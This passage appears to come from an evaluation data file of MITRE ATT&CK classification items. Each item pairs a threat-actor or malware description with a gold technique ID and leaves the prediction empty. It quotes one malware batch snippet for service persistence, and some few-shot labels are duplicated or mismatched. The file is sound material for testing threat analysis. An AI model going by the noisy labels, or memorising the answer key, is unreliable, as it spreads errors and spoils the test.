names.\n\nExamples:\n- Text: CharmPower can enumerate the OS version and computer name on a targeted system.\n\t - T1082: System Information Discovery\n- Text: Crimson can identify the geographical location of a victim host.\n\t - T1614: System Location Discovery\n- Text: Windshift has used malware to identify installed software.\n\t - T1518: Software Discovery\n", + "input": "SideCopy has identified the OS version of a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: can use the command-line utility cacls.exe to change file permissions.\n\t - T1059: Command and Scripting Interpreter\n\t - T1222: File and Directory Permissions Modification\n- Text: DustySky achieves persistence by creating a Registry entry in \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "APT39 has modified LNK shortcuts.", + "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has exfiltrated files and directories of interest from the targeted system.\n\t - T1005: Data from Local System\n- Text: Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Rising Sun has collected data and files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RATANKBA gathers the victim\u2019s IP address via the \"ipconfig -all\" command.\n\t - T1016: System Network Configuration Discovery\n- Text: can be used to enumerate local network connections, including active TCP connections and other network statistics.\n\t - T1049: System Network Connections Discovery\n- Text: Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started\n\t - T1135: Network Share Discovery\n", + "input": "Pupy has built in commands to identify a host\u2019s IP address and find out other network configuration settings by viewing connected sessions.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions\n\t - T1106: Native API\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON\n\t - T1027: Obfuscated Files or Information\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: TrickBot can Base64-encode C2 commands.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "TA551 has hidden encoded data for malware DLLs in a PNG.", + "gold": "- T1027.003: Obfuscated Files or Information - Steganography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hikit performs XOR encryption.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Trojan.Karagany can secure C2 communications with SSL and TLS.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: SombRAT has encrypted collected data with AES-256 using a hardcoded key.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Okrum uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another\u2019s process token just for the execution of a command\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: The malware\u2019s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process \u201cExplorer.exe\u201d, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.\n\t - T1134: Access Token Manipulation\n", + "input": "Turla RPC backdoors can impersonate or steal process tokens before executing commands.", + "gold": "- T1134.002: Access Token Manipulation - Create Process with Token", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Koadic can perform process injection by using a reflective DLL.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: runs its core DLL file using rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017.\n\t - T1218.013: System Binary Proxy Execution - Mavinject\n", + "input": "Heyoka Backdoor can inject a DLL into rundll32.exe for execution.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoshC2 can use Invoke-RunAs to make tokens.\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: InvisiMole has used Windows services as a way to execute its malicious payload.\n\t - T1569.002: System Services - Service Execution\n- Text: If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "WhisperGate can use `cmd.exe` to execute commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Diavol will terminate services using the Service Control Manager (SCM) API.\n\t - T1489: Service Stop\n- Text: Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id\n\t - T1047: Windows Management Instrumentation\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1047: Windows Management Instrumentation\n\t - T1047: Windows Management Instrumentation\n", + "input": "jRAT can query and kill system processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: KeyBoy installs a keylogger for intercepting credentials and keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n- Text: At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \u201cRecordToFile\u201d file stealer method\n\t - T1056.004: Input Capture - Credential API Hooking\n", + "input": "Unknown Logger is capable of stealing usernames and passwords from browsers on the victim machine.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 has used Pastebin and Google Storage to host content for their operations.\n\t - T1102: Web Service\n- Text: APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: No matching sample found for T1525\n", + "input": "Fox Kitten has used Amazon Web Services to host C2.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pandora has the ability to encrypt communications with D3DES.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143\n\t - T1571: Non-Standard Port\n- Text: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Explosive has encrypted communications with the RC4 method.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: OutSteel can automatically upload collected files to its C2 server.\n\t - T1020: Automated Exfiltration\n", + "input": "PingPull has the ability to exfiltrate stolen victim data through its C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It also creates a folder in C:\\SDRSMLINK\\ and shares this folder with the rest of the network\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1564.006: Hide Artifacts - Run Virtual Instance\n- Text: For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT.\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: esentutl can be used to copy files to/from a remote share.\n\t - T1570: Lateral Tool Transfer\n", + "input": "During C0015, the threat actors used Conti ransomware to encrypt a compromised network.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is executed using rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: creates a backdoor through which remote attackers can load and call DLL functions.\n\t - T1129: Shared Modules\n- Text: Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", + "input": "The Winnti for Windows installer loads a DLL using rundll32.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: copy %~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f sc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\" SC failure \"%SERVICE_NAME%\" reset= 86400 actions=\"\n\t - T1055: Process Injection\n- Text: Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic\n\t - T1057: Process Discovery\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1083: File and Directory Discovery\n", + "input": "CostaBricks can inject a payload into the memory of a compromised host.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast\u2019s acquisition of Piriform on July 18, 2017\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- Text: Mustang Panda has installed TeamViewer on targeted systems.\n\t - T1219: Remote Access Software\n- Text: Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "NETWIRE has masqueraded as legitimate software including TeamViewer and macOS Finder.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kinsing was executed with an Ubuntu container entry point that runs shell scripts.\n\t - T1609: Container Administration Command\n- Text: Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n", + "input": "Comnie executes BAT scripts.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: Dragonfly has dropped and executed SecretsDump to dump password hashes.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "Dragonfly has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.", + "gold": "- T1003.003: OS Credential Dumping - NTDS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n- Text: Our analysis of the backdoors used in the September 2018 attacks show that AuditCred.dll/ROptimizer.dll was similarly used: FileTokenBroker.dll (2017 attack) AuditCred.dll/Roptimizer.dll (2018 attack) Launch Method Service Service Function Loader Component Loader Component Working directory %Windows%\\System32 %Windows%\\System32 Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado Loaded Component Blending Blends with .mui files Blend with ActiveX data Object dll files Table1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components: AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) \u2013 loader DLL that is launched as a service Msadoz.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) \u2013 encrypted backdoor n = number of characters in the loader dll\u2019s filename Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) \u2013 encrypted configuration file Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: RCSession can be installed via DLL side-loading.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "menuPass has used process hollowing in iexplore.exe to load the RedLeaves implant.", + "gold": "- T1055.012: Process Injection - Process Hollowing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TA505 has downloaded additional malware to execute on victim systems.\n\t - T1105: Ingress Tool Transfer\n- Text: Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord\u2019s content delivery network (CDN). Discord\u2019s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL\n\t - T1102: Web Service\n- Text: The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process\n\t - T1055.002: Process Injection - Portable Executable Injection\n", + "input": "Rocke used malware to download additional malicious files to the target system.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet enumerates removable drives for infection.\n\t - T1120: Peripheral Device Discovery\n- Text: UNC2452 developed SUNSPOT, SUNBURST, TEARDROP, and Raindrop; SUNSPOT and SUNBURST were tailored to be incorporated into SolarWind's Orion software library.\n\t - T1587.001: Develop Capabilities - Malware\n- Text: uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.\n\t - T1091: Replication Through Removable Media\n", + "input": "Heyoka Backdoor can identify removable media attached to victim's machines.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.\n\t - T1082: System Information Discovery\n- Text: A tool can read and decrypt stored Registry values.\n\t - T1012: Query Registry\n", + "input": "SynAck gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.\n\t - T1046: Network Service Discovery\n- Text: APT3 has been known to remove indicators of compromise from tools.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor\u2019s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the \u2018Winnti umbrella and linked groups\u2019, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\t - T1587.001: Develop Capabilities - Malware\n", + "input": "GALLIUM packed some payloads using different types of packers, both known and custom.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent\n\t - T1543.001: Create or Modify System Process - Launch Agent\n\t - T1105: Ingress Tool Transfer\n- Text: It uses virtualization software \u2013 QEMU on macOS and VirtualBox on Windows \u2013 to mine 